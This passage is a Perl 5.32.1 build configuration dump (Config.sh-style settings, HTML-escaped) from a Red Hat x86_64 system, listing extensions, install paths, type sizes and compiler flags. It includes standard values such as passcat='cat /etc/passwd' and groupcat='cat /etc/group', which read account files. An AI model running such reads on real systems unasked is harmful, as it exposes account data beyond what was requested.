Module/Load/Conditional Module/Loaded Module/Metadata NEXT Net/Ping Params/Check Perl/OSType PerlIO/via/QuotedPrint Pod/Checker Pod/Escapes Pod/Functions Pod/Html Pod/Perldoc Pod/Simple Pod/Usage Safe Search/Dict SelfLoader Term/ANSIColor Term/Cap Term/Complete Term/ReadLine Test Test/Harness Test/Simple Text/Abbrev Text/Balanced Text/ParseWords Text/Tabs Thread/Queue Thread/Semaphore Tie/File Tie/Hash/NamedCapture Tie/Memoize Tie/RefHash Time/Local XSLoader autodie autouse base bignum constant encoding/warnings experimental if lib libnet parent perlfaq podlators version&#039;
extern_C=&#039;extern&#039;
extras=&#039;&#039;
fflushNULL=&#039;define&#039;
fflushall=&#039;undef&#039;
find=&#039;&#039;
firstmakefile=&#039;makefile&#039;
flex=&#039;&#039;
fpossize=&#039;16&#039;
fpostype=&#039;fpos_t&#039;
freetype=&#039;void&#039;
from=&#039;:&#039;
full_ar=&#039;/usr/bin/ar&#039;
full_csh=&#039;csh&#039;
full_sed=&#039;/usr/bin/sed&#039;
gccansipedantic=&#039;&#039;
gccosandvers=&#039;&#039;
gccversion=&#039;11.5.0 20240719 (Red Hat 11.5.0-5)&#039;
getgrent_r_proto=&#039;REENTRANT_PROTO_I_SBWR&#039;
getgrgid_r_proto=&#039;REENTRANT_PROTO_I_TSBWR&#039;
getgrnam_r_proto=&#039;REENTRANT_PROTO_I_CSBWR&#039;
gethostbyaddr_r_proto=&#039;REENTRANT_PROTO_I_TsISBWRE&#039;
gethostbyname_r_proto=&#039;REENTRANT_PROTO_I_CSBWRE&#039;
gethostent_r_proto=&#039;REENTRANT_PROTO_I_SBWRE&#039;
getlogin_r_proto=&#039;REENTRANT_PROTO_I_BW&#039;
getnetbyaddr_r_proto=&#039;REENTRANT_PROTO_I_uISBWRE&#039;
getnetbyname_r_proto=&#039;REENTRANT_PROTO_I_CSBWRE&#039;
getnetent_r_proto=&#039;REENTRANT_PROTO_I_SBWRE&#039;
getprotobyname_r_proto=&#039;REENTRANT_PROTO_I_CSBWR&#039;
getprotobynumber_r_proto=&#039;REENTRANT_PROTO_I_ISBWR&#039;
getprotoent_r_proto=&#039;REENTRANT_PROTO_I_SBWR&#039;
getpwent_r_proto=&#039;REENTRANT_PROTO_I_SBWR&#039;
getpwnam_r_proto=&#039;REENTRANT_PROTO_I_CSBWR&#039;
getpwuid_r_proto=&#039;REENTRANT_PROTO_I_TSBWR&#039;
getservbyname_r_proto=&#039;REENTRANT_PROTO_I_CCSBWR&#039;
getservbyport_r_proto=&#039;REENTRANT_PROTO_I_ICSBWR&#039;
getservent_r_proto=&#039;REENTRANT_PROTO_I_SBWR&#039;
getspnam_r_proto=&#039;REENTRANT_PROTO_I_CSBWR&#039;
gidformat=&#039;&quot;u&quot;&#039;
gidsign=&#039;1&#039;
gidsize=&#039;4&#039;
gidtype=&#039;gid_t&#039;
glibpth=&#039;/usr/shlib  /lib /usr/lib /usr/lib/386 /lib/386 /usr/ccs/lib /usr/ucblib /usr/local/lib /lib64 /usr/lib64 /usr/local/lib64 &#039;
gmake=&#039;gmake&#039;
gmtime_r_proto=&#039;REENTRANT_PROTO_S_TS&#039;
gnulibc_version=&#039;2.34&#039;
grep=&#039;grep&#039;
groupcat=&#039;cat /etc/group&#039;
groupstype=&#039;gid_t&#039;
gzip=&#039;gzip&#039;
h_fcntl=&#039;false&#039;
h_sysfile=&#039;true&#039;
hint=&#039;recommended&#039;
hostcat=&#039;cat /etc/hosts&#039;
hostgenerate=&#039;&#039;
hostosname=&#039;&#039;
hostperl=&#039;&#039;
html1dir=&#039; &#039;
html1direxp=&#039;&#039;
html3dir=&#039; &#039;
html3direxp=&#039;&#039;
i16size=&#039;2&#039;
i16type=&#039;short&#039;
i32size=&#039;4&#039;
i32type=&#039;int&#039;
i64size=&#039;8&#039;
i64type=&#039;long&#039;
i8size=&#039;1&#039;
i8type=&#039;signed char&#039;
i_arpainet=&#039;define&#039;
i_bfd=&#039;undef&#039;
i_bsdioctl=&#039;&#039;
i_crypt=&#039;define&#039;
i_db=&#039;define&#039;
i_dbm=&#039;define&#039;
i_dirent=&#039;define&#039;
i_dlfcn=&#039;define&#039;
i_execinfo=&#039;define&#039;
i_fcntl=&#039;undef&#039;
i_fenv=&#039;define&#039;
i_fp=&#039;undef&#039;
i_fp_class=&#039;undef&#039;
i_gdbm=&#039;define&#039;
i_gdbm_ndbm=&#039;undef&#039;
i_gdbmndbm=&#039;define&#039;
i_grp=&#039;define&#039;
i_ieeefp=&#039;undef&#039;
i_inttypes=&#039;define&#039;
i_langinfo=&#039;define&#039;
i_libutil=&#039;undef&#039;
i_limits=&#039;define&#039;
i_locale=&#039;define&#039;
i_machcthr=&#039;undef&#039;
i_malloc=&#039;define&#039;
i_mallocmalloc=&#039;undef&#039;
i_mntent=&#039;define&#039;
i_ndbm=&#039;undef&#039;
i_netdb=&#039;define&#039;
i_neterrno=&#039;undef&#039;
i_netinettcp=&#039;define&#039;
i_niin=&#039;define&#039;
i_poll=&#039;define&#039;
i_prot=&#039;undef&#039;
i_pthread=&#039;define&#039;
i_pwd=&#039;define&#039;
i_quadmath=&#039;undef&#039;
i_rpcsvcdbm=&#039;undef&#039;
i_sgtty=&#039;undef&#039;
i_shadow=&#039;define&#039;
i_socks=&#039;undef&#039;
i_stdbool=&#039;define&#039;
i_stdint=&#039;define&#039;
i_stdlib=&#039;define&#039;
i_string=&#039;define&#039;
i_sunmath=&#039;undef&#039;
i_sysaccess=&#039;undef&#039;
i_sysdir=&#039;define&#039;
i_sysfile=&#039;define&#039;
i_sysfilio=&#039;undef&#039;
i_sysin=&#039;undef&#039;
i_sysioctl=&#039;define&#039;
i_syslog=&#039;define&#039;
i_sysmman=&#039;define&#039;
i_sysmode=&#039;undef&#039;
i_sysmount=&#039;define&#039;
i_sysndir=&#039;undef&#039;
i_sysparam=&#039;define&#039;
i_syspoll=&#039;define&#039;
i_sysresrc=&#039;define&#039;
i_syssecrt=&#039;undef&#039;
i_sysselct=&#039;define&#039;
i_syssockio=&#039;undef&#039;
i_sysstat=&#039;define&#039;
i_sysstatfs=&#039;define&#039;
i_sysstatvfs=&#039;define&#039;
i_systime=&#039;define&#039;
i_systimek=&#039;undef&#039;
i_systimes=&#039;define&#039;
i_systypes=&#039;define&#039;
i_sysuio=&#039;define&#039;
i_sysun=&#039;define&#039;
i_sysutsname=&#039;define&#039;
i_sysvfs=&#039;define&#039;
i_syswait=&#039;define&#039;
i_termio=&#039;undef&#039;
i_termios=&#039;define&#039;
i_time=&#039;define&#039;
i_unistd=&#039;define&#039;
i_ustat=&#039;undef&#039;
i_utime=&#039;define&#039;
i_vfork=&#039;undef&#039;
i_wchar=&#039;define&#039;
i_wctype=&#039;define&#039;
i_xlocale=&#039;undef&#039;
ignore_versioned_solibs=&#039;y&#039;
inc_version_list=&#039; &#039;
inc_version_list_init=&#039;0&#039;
incpath=&#039;&#039;
incpth=&#039;/usr/lib/gcc/x86_64-redhat-linux/11/include /usr/local/include /usr/include&#039;
inews=&#039;&#039;
initialinstalllocation=&#039;/usr/bin&#039;
installarchlib=&#039;/usr/lib64/perl5&#039;
installbin=&#039;/usr/bin&#039;
installhtml1dir=&#039;&#039;
installhtml3dir=&#039;&#039;
installman1dir=&#039;/usr/share/man/man1&#039;
installman3dir=&#039;/usr/share/man/man3&#039;
installprefix=&#039;/usr&#039;
installprefixexp=&#039;/usr&#039;
installprivlib=&#039;/usr/share/perl5&#039;
installscript=&#039;/usr/bin&#039;
installsitearch=&#039;/usr/local/lib64/perl5/5.32&#039;
installsitebin=&#039;/usr/local/bin&#039;
installsitehtml1dir=&#039;&#039;
installsitehtml3dir=&#039;&#039;
installsitelib=&#039;/usr/local/share/perl5/5.32&#039;
installsiteman1dir=&#039;/usr/local/share/man/man1&#039;
installsiteman3dir=&#039;/usr/local/share/man/man3&#039;
installsitescript=&#039;/usr/local/bin&#039;
installstyle=&#039;lib64/perl5&#039;
installusrbinperl=&#039;undef&#039;
installvendorarch=&#039;/usr/lib64/perl5/vendor_perl&#039;
installvendorbin=&#039;/usr/bin&#039;
installvendorhtml1dir=&#039;&#039;
installvendorhtml3dir=&#039;&#039;
installvendorlib=&#039;/usr/share/perl5/vendor_perl&#039;
installvendorman1dir=&#039;/usr/share/man/man1&#039;
installvendorman3dir=&#039;/usr/share/man/man3&#039;
installvendorscript=&#039;/usr/bin&#039;
intsize=&#039;4&#039;
issymlink=&#039;test -h&#039;
ivdformat=&#039;&quot;ld&quot;&#039;
ivsize=&#039;8&#039;
ivtype=&#039;long&#039;
known_extensions=&#039;Amiga/ARexx Amiga/Exec Archive/Tar Attribute/Handlers AutoLoader B CPAN CPAN/Meta CPAN/Meta/Requirements CPAN/Meta/YAML Carp Compress/Raw/Bzip2 Compress/Raw/Zlib Config/Perl/V Cwd DB_File Data/Dumper Devel/PPPort Devel/Peek Devel/SelfStubber Digest Digest/MD5 Digest/SHA Dumpvalue Encode Env Errno Exporter ExtUtils/CBuilder ExtUtils/Constant ExtUtils/Install ExtUtils/MakeMaker ExtUtils/Manifest ExtUtils/Miniperl ExtUtils/ParseXS Fcntl File/DosGlob File/Fetch File/Find File/Glob File/Path File/Temp FileCache Filter/Simple Filter/Util/Call FindBin GDBM_File Getopt/Long HTTP/Tiny Hash/Util Hash/Util/FieldHash I18N/Collate I18N/LangTags I18N/Langinfo IO IO/Compress IO/Socket/IP IO/Zlib IPC/Cmd IPC/Open3 IPC/SysV JSON/PP List/Util Locale/Maketext Locale/Maketext/Simple MIME/Base64 Math/BigInt Math/BigInt/FastCalc Math/BigRat Math/Complex Memoize Module/CoreList Module/Load Module/Load/Conditional Module/Loaded Module/Metadata NDBM_File NEXT Net/Ping ODBM_File Opcode POSIX Params/Check Perl/OSType PerlIO/encoding PerlIO/mmap PerlIO/scalar PerlIO/via PerlIO/via/QuotedPrint Pod/Checker Pod/Escapes Pod/Functions Pod/Html Pod/Perldoc Pod/Simple Pod/Usage SDBM_File Safe Search/Dict SelfLoader Socket Storable Sys/Hostname Sys/Syslog Term/ANSIColor Term/Cap Term/Complete Term/ReadLine Test Test/Harness Test/Simple Text/Abbrev Text/Balanced Text/ParseWords Text/Tabs Thread/Queue Thread/Semaphore Tie/File Tie/Hash/NamedCapture Tie/Memoize Tie/RefHash Time/HiRes Time/Local Time/Piece Unicode/Collate Unicode/Normalize VMS/DCLsym VMS/Filespec VMS/Stdio Win32 Win32API/File Win32CORE XS/APItest XS/Typemap XSLoader attributes autodie autouse base bignum constant encoding/warnings experimental if lib libnet mro parent perlfaq podlators re threads threads/shared version &#039;
ksh=&#039;&#039;
ld=&#039;gcc&#039;
ld_can_script=&#039;define&#039;
lddlflags=&#039;-lpthread -shared -Wl,-z,relro -Wl,--as-needed -Wl,-z,now -specs=/usr/lib/rpm/redhat/redhat-hardened-ld -specs=/usr/lib/rpm/redhat/redhat-annobin-cc1  -L/usr/local/lib -fstack-protector-strong&#039;
ldflags=&#039;-Wl,-z,relro -Wl,--as-needed -Wl,-z,now -specs=/usr/lib/rpm/redhat/redhat-hardened-ld -specs=/usr/lib/rpm/redhat/redhat-annobin-cc1  -fstack-protector-strong -L/usr/local/lib&#039;
ldflags_uselargefiles=&#039;&#039;
ldlibpthname=&#039;LD_LIBRARY_PATH&#039;
less=&#039;less&#039;
lib_ext=&#039;.a&#039;
libc=&#039;/lib/../lib64/libc.so.6&#039;
libdb_needs_pthread=&#039;N&#039;
libperl=&#039;libperl.so&#039;
libpth=&#039;/usr/local/lib64 /lib64 /usr/lib64 /usr/local/lib /usr/lib /lib/../lib64 /usr/lib/../lib64 /lib&#039;
libs=&#039;-lpthread -lresolv -lgdbm -ldb -ldl -lm -lcrypt -lutil -lc -lgdbm_compat&#039;
libsdirs=&#039; /lib64&#039;
libsfiles=&#039; libpthread.a libresolv.so libgdbm.so libdb.so libdl.a libm.so libcrypt.so libutil.a libc.so libgdbm_compat.so&#039;
libsfound=&#039; /lib64/libpthread.a /lib64/libresolv.so /lib64/libgdbm.so /lib64/libdb.so /lib64/libdl.a /lib64/libm.so /lib64/libcrypt.so /lib64/libutil.a /lib64/libc.so /lib64/libgdbm_compat.so&#039;
libspath=&#039; /usr/local/lib64 /lib64 /usr/lib64 /usr/local/lib /usr/lib /lib/../lib64 /usr/lib/../lib64 /lib&#039;
libswanted=&#039;cl pthread socket resolv inet nsl gdbm dbm db malloc dl ld sun m crypt sec util c cposix posix ucb BSD gdbm_compat&#039;
libswanted_uselargefiles=&#039;&#039;
line=&#039;&#039;
lint=&#039;&#039;
lkflags=&#039;&#039;
ln=&#039;ln&#039;
lns=&#039;/usr/bin/ln -s&#039;
localtime_r_proto=&#039;REENTRANT_PROTO_S_TS&#039;
locincpth=&#039;/usr/local/include /opt/local/include /usr/gnu/include /opt/gnu/include /usr/GNU/include /opt/GNU/include&#039;
loclibpth=&#039;/usr/local/lib /opt/local/lib /usr/gnu/lib /opt/gnu/lib /usr/GNU/lib /opt/GNU/lib&#039;
longdblinfbytes=&#039;0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0xff, 0x7f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00&#039;
longdblkind=&#039;3&#039;
longdblmantbits=&#039;64&#039;
longdblnanbytes=&#039;0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00&#039;
longdblsize=&#039;16&#039;
longlongsize=&#039;8&#039;
longsize=&#039;8&#039;
lp=&#039;&#039;
lpr=&#039;&#039;
ls=&#039;ls&#039;
lseeksize=&#039;8&#039;
lseektype=&#039;off_t&#039;
mail=&#039;&#039;
mailx=&#039;&#039;
make=&#039;make&#039;
make_set_make=&#039;#&#039;
mallocobj=&#039;&#039;
mallocsrc=&#039;&#039;
malloctype=&#039;void *&#039;
man1dir=&#039;/usr/share/man/man1&#039;
man1direxp=&#039;/usr/share/man/man1&#039;
man1ext=&#039;1&#039;
man3dir=&#039;/usr/share/man/man3&#039;
man3direxp=&#039;/usr/share/man/man3&#039;
man3ext=&#039;3pm&#039;
mips_type=&#039;&#039;
mistrustnm=&#039;&#039;
mkdir=&#039;mkdir&#039;
mmaptype=&#039;void *&#039;
modetype=&#039;mode_t&#039;
more=&#039;more&#039;
multiarch=&#039;undef&#039;
mv=&#039;&#039;
myarchname=&#039;x86_64-linux&#039;
mydomain=&#039;.localdomain&#039;
myhostname=&#039;localhost&#039;
myuname=&#039;linux dfb22103dfd34bb3825af5be74e7d095 5.14.0-570.12.1.el9_6.x86_64 #1 smp preempt_dynamic tue may 13 06:11:55 edt 2025 x86_64 x86_64 x86_64 gnulinux &#039;
n=&#039;-n&#039;
need_va_copy=&#039;define&#039;
netdb_hlen_type=&#039;size_t&#039;
netdb_host_type=&#039;char *&#039;
netdb_name_type=&#039;const char *&#039;
netdb_net_type=&#039;in_addr_t&#039;
nm=&#039;nm&#039;
nm_opt=&#039;&#039;
nm_so_opt=&#039;--dynamic&#039;
nonxs_ext=&#039;Archive/Tar Attribute/Handlers AutoLoader CPAN CPAN/Meta CPAN/Meta/Requirements CPAN/Meta/YAML Carp Config/Perl/V Devel/SelfStubber Digest Dumpvalue Env Errno Exporter ExtUtils/CBuilder ExtUtils/Constant ExtUtils/Install ExtUtils/MakeMaker ExtUtils/Manifest ExtUtils/Miniperl ExtUtils/ParseXS File/Fetch File/Find File/Path File/Temp FileCache Filter/Simple FindBin Getopt/Long HTTP/Tiny I18N/Collate I18N/LangTags IO/Compress IO/Socket/IP IO/Zlib IPC/Cmd IPC/Open3 JSON/PP Locale/Maketext Locale/Maketext/Simple Math/BigInt Math/BigRat Math/Complex Memoize Module/CoreList Module/Load Module/Load/Conditional Module/Loaded Module/Metadata NEXT Net/Ping Params/Check Perl/OSType PerlIO/via/QuotedPrint Pod/Checker Pod/Escapes Pod/Functions Pod/Html Pod/Perldoc Pod/Simple Pod/Usage Safe Search/Dict SelfLoader Term/ANSIColor Term/Cap Term/Complete Term/ReadLine Test Test/Harness Test/Simple Text/Abbrev Text/Balanced Text/ParseWords Text/Tabs Thread/Queue Thread/Semaphore Tie/File Tie/Hash/NamedCapture Tie/Memoize Tie/RefHash Time/Local XSLoader autodie autouse base bignum constant encoding/warnings experimental if lib libnet parent perlfaq podlators version&#039;
nroff=&#039;nroff&#039;
nvEUformat=&#039;&quot;E&quot;&#039;
nvFUformat=&#039;&quot;F&quot;&#039;
nvGUformat=&#039;&quot;G&quot;&#039;
nv_overflows_integers_at=&#039;256.0*256.0*256.0*256.0*256.0*256.0*2.0*2.0*2.0*2.0*2.0&#039;
nv_preserves_uv_bits=&#039;53&#039;
nveformat=&#039;&quot;e&quot;&#039;
nvfformat=&#039;&quot;f&quot;&#039;
nvgformat=&#039;&quot;g&quot;&#039;
nvmantbits=&#039;52&#039;
nvsize=&#039;8&#039;
nvtype=&#039;double&#039;
o_nonblock=&#039;O_NONBLOCK&#039;
obj_ext=&#039;.o&#039;
old_pthread_create_joinable=&#039;&#039;
optimize=&#039;  -g&#039;
orderlib=&#039;false&#039;
osname=&#039;linux&#039;
osvers=&#039;5.14.0-570.12.1.el9_6.x86_64&#039;
otherlibdirs=&#039; &#039;
package=&#039;perl5&#039;
pager=&#039;/usr/bin/less -isr&#039;
passcat=&#039;cat /etc/passwd&#039;
patchlevel=&#039;32&#039;
path_sep=&#039;:&#039;
perl=&#039;perl&#039;
perl5=&#039;&#039;
perl_patchlevel=&#039;&#039;
perl_static_inline=&#039;static __inline__&#039;
perladmin=&#039;root@localhost&#039;
perllibs=&#039;-lpthread -lresolv -ldl -lm -lcrypt -lutil -lc&#039;
perlpath=&#039;/usr/bin/perl&#039;
pg=&#039;pg&#039;
phostname=&#039;&#039;
pidtype=&#039;pid_t&#039;
plibpth=&#039;/lib/x86_64-redhat-linux/11 /lib/../lib64 /usr/lib/x86_64-redhat-linux/11 /usr/lib/../lib64 /lib /usr/lib&#039;
pmake=&#039;&#039;
pr=&#039;&#039;
prefix=&#039;/usr&#039;
prefixexp=&#039;/usr&#039;
privlib=&#039;/usr/share/perl5&#039;
privlibexp=&#039;/usr/share/perl5&#039;
procselfexe=&#039;&quot;/proc/self/exe&quot;&#039;
prototype=&#039;define&#039;
ptrsize=&#039;8&#039;
quadkind=&#039;2&#039;
quadtype=&#039;long&#039;
randbits=&#039;48&#039;
randfunc=&#039;Perl_drand48&#039;
random_r_proto=&#039;REENTRANT_PROTO_I_St&#039;
randseedtype=&#039;U32&#039;
ranlib=&#039;:&#039;
rd_nodata=&#039;-1&#039;
readdir64_r_proto=&#039;REENTRANT_PROTO_I_TSR&#039;
readdir_r_proto=&#039;REENTRANT_PROTO_I_TSR&#039;
revision=&#039;5&#039;
rm=&#039;rm&#039;
rm_try=&#039;/usr/bin/rm -f try try a.out .out try.[cho] try..o core core.try* try.core*&#039;
rmail=&#039;&#039;
run=&#039;&#039;
runnm=&#039;false&#039;
sGMTIME_max=&#039;67768036191676799&#039;
sGMTIME_min=&#039;-62167219200&#039;
sLOCALTIME_max=&#039;67768036191694799&#039;
sLOCALTIME_min=&#039;-62167201438&#039;
sPRIEUldbl=&#039;&quot;LE&quot;&#039;
sPRIFUldbl=&#039;&quot;LF&quot;&#039;
sPRIGUldbl=&#039;&quot;LG&quot;&#039;
sPRIXU64=&#039;&quot;lX&quot;&#039;
sPRId64=&#039;&quot;ld&quot;&#039;
sPRIeldbl=&#039;&quot;Le&quot;&#039;
sPRIfldbl=&#039;&quot;Lf&quot;&#039;
sPRIgldbl=&#039;&quot;Lg&quot;&#039;
sPRIi64=&#039;&quot;li&quot;&#039;
sPRIo64=&#039;&quot;lo&quot;&#039;
sPRIu64=&#039;&quot;lu&quot;&#039;
sPRIx64=&#039;&quot;lx&quot;&#039;
sSCNfldbl=&#039;&quot;Lf&quot;&#039;
sched_yield=&#039;sched_yield()&#039;
scriptdir=&#039;/usr/bin&#039;
scriptdirexp=&#039;/usr/bin&#039;
sed=&#039;sed&#039;
seedfunc=&#039;Perl_drand48_init&#039;
selectminbits=&#039;64&#039;
selecttype=&#039;fd_set *&#039;
sendmail=&#039;&#039;
setgrent_r_proto=&#039;0&#039;
sethostent_r_proto=&#039;0&#039;
setlocale_r_proto=&#039;0&#039;
setnetent_r_proto=&#039;0&#039;
setprotoent_r_proto=&#039;0&#039;
setpwent_r_proto=&#039;0&#039;
setservent_r_proto=&#039;0&#039;
sh=&#039;/bin/sh&#039;
shar=&#039;&#039;
sharpbang=&#039;#!&#039;
shmattype=&#039;void *&#039;
shortsize=&#039;2&#039;
shrpenv=&#039;&#039;
shsharp=&#039;true&#039;
sig_count=&#039;65&#039;
sig_name=&#039;ZERO HUP INT QUIT ILL TRAP ABRT BUS FPE KILL USR1 SEGV USR2 PIPE ALRM TERM STKFLT CHLD CONT STOP TSTP TTIN TTOU URG XCPU XFSZ VTALRM PROF WINCH IO PWR SYS NUM32 NUM33 RTMIN NUM35 NUM36 NUM37 NUM38 NUM39 NUM40 NUM41 NUM42 NUM43 NUM44 NUM45 NUM46 NUM47 NUM48 NUM49 NUM50 NUM51 NUM52 NUM53 NUM54 NUM55 NUM56 NUM57 NUM58 NUM59 NUM60 NUM61 NUM62 NUM63 RTMAX IOT CLD POLL &#039;
sig_name_init=&#039;&quot;ZERO&quot;, &quot;HUP&quot;, &quot;INT&quot;, &quot;QUIT&quot;, &quot;ILL&quot;, &quot;TRAP&quot;, &quot;ABRT&quot;, &quot;BUS&quot;, &quot;FPE&quot;, &quot;KILL&quot;, &quot;USR1&quot;, &quot;SEGV&quot;, &quot;USR2&quot;, &quot;PIPE&quot;, &quot;ALRM&quot;, &quot;TERM&quot;, &quot;STKFLT&quot;, &quot;CHLD&quot;, &quot;CONT&quot;, &quot;STOP&quot;, &quot;TSTP&quot;, &quot;TTIN&quot;, &quot;TTOU&quot;, &quot;URG&quot;, &quot;XCPU&quot;, &quot;XFSZ&quot;, &quot;VTALRM&quot;, &quot;PROF&quot;, &quot;WINCH&quot;, &quot;IO&quot;, &quot;PWR&quot;, &quot;SYS&quot;, &quot;NUM32&quot;, &quot;NUM33&quot;, &quot;RTMIN&quot;, &quot;NUM35&quot;, &quot;NUM36&quot;, &quot;NUM37&quot;, &quot;NUM38&quot;, &quot;NUM39&quot;, &quot;NUM40&quot;, &quot;NUM41&quot;, &quot;NUM42&quot;, &quot;NUM43&quot;, &quot;NUM44&quot;, &quot;NUM45&quot;, &quot;NUM46&quot;, &quot;NUM47&quot;, &quot;NUM48&quot;, &quot;NUM49&quot;, &quot;NUM50&quot;, &quot;NUM51&quot;, &quot;NUM52&quot;, &quot;NUM53&quot;, &quot;NUM54&quot;, &quot;NUM55&quot;, &quot;NUM56&quot;, &quot;NUM57&quot;, &quot;NUM58&quot;, &quot;NUM59&quot;, &quot;NUM60&quot;, &quot;NUM61&quot;, &quot;NUM62&quot;, &quot;NUM63&quot;, &quot;RTMAX&quot;, &quot;IOT&quot;, &quot;CLD&quot;, &quot;POLL&quot;, 0&#039;
sig_num=&#039;0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 6 17 29 &#039;
sig_num_init=&#039;0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 6, 17, 29, 0&#039;
sig_size=&#039;68&#039;
signal_t=&#039;void&#039;
sitearch=&#039;/usr/local/lib64/perl5/5.32&#039;
sitearchexp=&#039;/usr/local/lib64/perl5/5.32&#039;
sitebin=&#039;/usr/local/bin&#039;
sitebinexp=&#039;/usr/local/bin&#039;
sitehtml1dir=&#039;&#039;
sitehtml1direxp=&#039;&#039;
sitehtml3dir=&#039;&#039;
sitehtml3direxp=&#039;&#039;
sitelib=&#039;/usr/local/share/perl5/5.32&#039;
sitelib_stem=&#039;/usr/local/share/perl5/5.32&#039;
sitelibexp=&#039;/usr/local/share/perl5/5.32&#039;
siteman1dir=&#039;/usr/local/share/man/man1&#039;
siteman1direxp=&#039;/usr/local/share/man/man1&#039;
siteman3dir=&#039;/usr/local/share/man/man3&#039;
siteman3direxp=&#039;/usr/local/share/man/man3&#039;
siteprefix=&#039;/usr/local&#039;
siteprefixexp=&#039;/usr/local&#039;
sitescript=&#039;/usr/local/bin&#039;
sitescriptexp=&#039;/usr/local/bin&#039;
sizesize=&#039;8&#039;
sizetype=&#039;size_t&#039;
sleep=&#039;&#039;
smail=&#039;&#039;
so=&#039;so&#039;
sockethdr=&#039;&#039;
socketlib=&#039;&#039;
socksizetype=&#039;socklen_t&#039;
sort=&#039;sort&#039;
spackage=&#039;Perl5&#039;
spitshell=&#039;cat&#039;
srand48_r_proto=&#039;REENTRANT_PROTO_I_LS&#039;
srandom_r_proto=&#039;REENTRANT_PROTO_I_TS&#039;
src=&#039;.&#039;
ssizetype=&#039;ssize_t&#039;
st_ino_sign=&#039;1&#039;
st_ino_size=&#039;8&#039;
startperl=&#039;#!/usr/bin/perl&#039;
startsh=&#039;#!/bin/sh&#039;
static_ext=&#039; &#039;
stdchar=&#039;char&#039;
stdio_base=&#039;((fp)-&gt;_base)&#039;
stdio_bufsiz=&#039;((fp)-&gt;_cnt + (fp)-&gt;_ptr - (fp)-&gt;_base)&#039;
stdio_cnt=&#039;((fp)-&gt;_cnt)&#039;
stdio_filbuf=&#039;&#039;
stdio_ptr=&#039;((fp)-&gt;_ptr)&#039;
stdio_stream_array=&#039;&#039;
strerror_r_proto=&#039;REENTRANT_PROTO_B_IBW&#039;
submit=&#039;&#039;
subversion=&#039;1&#039;
sysman=&#039;/usr/share/man/man1&#039;
sysroot=&#039;&#039;
tail=&#039;&#039;
tar=&#039;&#039;
targetarch=&#039;&#039;
targetdir=&#039;&#039;
targetenv=&#039;&#039;
targethost=&#039;&#039;
targetmkdir=&#039;&#039;
targetport=&#039;&#039;
targetsh=&#039;/bin/sh&#039;
tbl=&#039;&#039;
tee=&#039;&#039;
test=&#039;test&#039;
timeincl=&#039;/usr/include/sys/time.h &#039;
timetype=&#039;time_t&#039;
tmpnam_r_proto=&#039;REENTRANT_PROTO_B_B&#039;
to=&#039;:&#039;
touch=&#039;touch&#039;
tr=&#039;tr&#039;
trnl=&#039;\n&#039;
troff=&#039;&#039;
ttyname_r_proto=&#039;REENTRANT_PROTO_I_IBW&#039;
u16size=&#039;2&#039;
u16type=&#039;unsigned short&#039;
u32size=&#039;4&#039;
u32type=&#039;unsigned int&#039;
u64size=&#039;8&#039;
u64type=&#039;unsigned long&#039;
u8size=&#039;1&#039;
u8type=&#039;unsigned char&#039;
uidformat=&#039;&quot;u&quot;&#039;
uidsign=&#039;1&#039;
uidsize=&#039;4&#039;
uidtype=&#039;uid_t&#039;
uname=&#039;uname&#039;
uniq=&#039;uniq&#039;
uquadtype=&#039;unsigned long&#039;
use5005threads=&#039;undef&#039;
use64bitall=&#039;define&#039;
use64bitint=&#039;define&#039;
usecbacktrace=&#039;undef&#039;
usecrosscompile=&#039;undef&#039;
usedevel=&#039;undef&#039;
usedl=&#039;define&#039;
usedtrace=&#039;define&#039;
usefaststdio=&#039;undef&#039;
useithreads=&#039;define&#039;
usekernprocpathname=&#039;undef&#039;
uselanginfo=&#039;true&#039;
uselargefiles=&#039;define&#039;
uselongdouble=&#039;undef&#039;
usemallocwrap=&#039;define&#039;
usemorebits=&#039;undef&#039;
usemultiplicity=&#039;define&#039;
usemymalloc=&#039;n&#039;
usenm=&#039;false&#039;
usensgetexecutablepath=&#039;undef&#039;
useopcode=&#039;true&#039;
useperlio=&#039;define&#039;
useposix=&#039;true&#039;
usequadmath=&#039;undef&#039;
usereentrant=&#039;undef&#039;
userelocatableinc=&#039;undef&#039;
useshrplib=&#039;true&#039;
usesitecustomize=&#039;define&#039;
usesocks=&#039;undef&#039;
usethreads=&#039;define&#039;
usevendorprefix=&#039;define&#039;
useversionedarchname=&#039;undef&#039;
usevfork=&#039;false&#039;
usrinc=&#039;/usr/include&#039;
uuname=&#039;&#039;
uvXUformat=&#039;&quot;lX&quot;&#039;
uvoformat=&#039;&quot;lo&quot;&#039;
uvsize=&#039;8&#039;
uvtype=&#039;unsigned long&#039;
uvuformat=&#039;&quot;lu&quot;&#039;
uvxformat=&#039;&quot;lx&quot;&#039;
vendorarch=&#039;/usr/lib64/perl5/vendor_perl&#039;
vendorarchexp=&#039;/usr/lib64/perl5/vendor_perl&#039;
vendorbin=&#039;/usr/bin&#039;
vendorbinexp=&#039;/usr/bin&#039;
vendorhtml1dir=&#039; &#039;
vendorhtml1direxp=&#039;&#039;
vendorhtml3dir=&#039; &#039;
vendorhtml3direxp=&#039;&#039;
vendorlib=&#039;/usr/share/perl5/vendor_perl&#039;
vendorlib_stem=&#039;/usr/share/perl5/vendor_perl&#039;
vendorlibexp=&#039;/usr/share/perl5/vendor_perl&#039;
vendorman1dir=&#039;/usr/share/man/man1&#039;
vendorman1direxp=&#039;/usr/share/man/man1&#039;
vendorman3dir=&#039;/usr/share/man/man3&#039;
vendorman3direxp=&#039;/usr/share/man/man3&#039;
vendorprefix=&#039;/usr&#039;
vendorprefixexp=&#039;/usr&#039;
vendorscript=&#039;/usr/bin&#039;
vendorscriptexp=&#039;/usr/bin&#039;
version=&#039;5.32.1&#039;
